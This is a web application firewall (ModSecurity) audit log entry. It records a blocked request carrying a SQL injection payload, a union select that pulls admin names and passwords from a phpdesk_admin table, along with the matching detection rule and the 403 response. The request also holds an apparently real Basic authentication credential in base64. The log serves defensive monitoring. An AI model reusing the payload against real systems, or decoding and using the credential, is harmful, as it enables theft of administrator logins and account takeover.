--a0733335-A--
[10/Apr/2012:14:05:54 --0700] T4SgsgoUMgYAAAz-IuIAAAAN 192.168.55.2 55786 10.20.50.6 443
--a0733335-B--
GET /?action=&type=view&s=&id=-1%27%20union%20select%200,concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109),char(101),char(58),name,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),pass),0,0,0,0,0%20from%20phpdesk_admin/* HTTP/1.1
Host: ******************
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Authorization: Basic d3Nhbmk6dHIrYXcydWY=

--a0733335-F--
HTTP/1.1 403 Forbidden
Last-Modified: Sat, 18 Oct 2008 00:13:54 GMT
Accept-Ranges: bytes
Content-Length: 5043
Keep-Alive: timeout=10
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

--a0733335-H--
Message:  [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "319"] [id "340017"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic SQL injection protection in ARGS"] [data "union select"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Match of "rx (?:^/edit_page$|/node/[0-9]+/edit|^/forum/posting\\.php|^/admins/wnedit\\.php|/alt_doc\\.php\\?returnUrl=.*edit|^/admin/categories\\.php\\?cPath=.*|modules\\.php\\?name=Forums&file=posting&mode=.*|^/joomla/administrator/index2\\.php|^/wiki/index\\.php? ..." against "REQUEST_URI" required.
Action: Intercepted (phase 2)
Stopwatch: 1334091954894231 27290 (- - -)
Stopwatch2: 1334091954894231 27290; combined=1913, p1=63, p2=1840, p3=0, p4=0, p5=10, sr=0, sw=0, l=0, gc=0
WAF: ModSecurity for Apache/2.6.5 (http://www.modsecurity.org/); 201001071602; 201001071602.
Server: Apache

--a0733335-Z--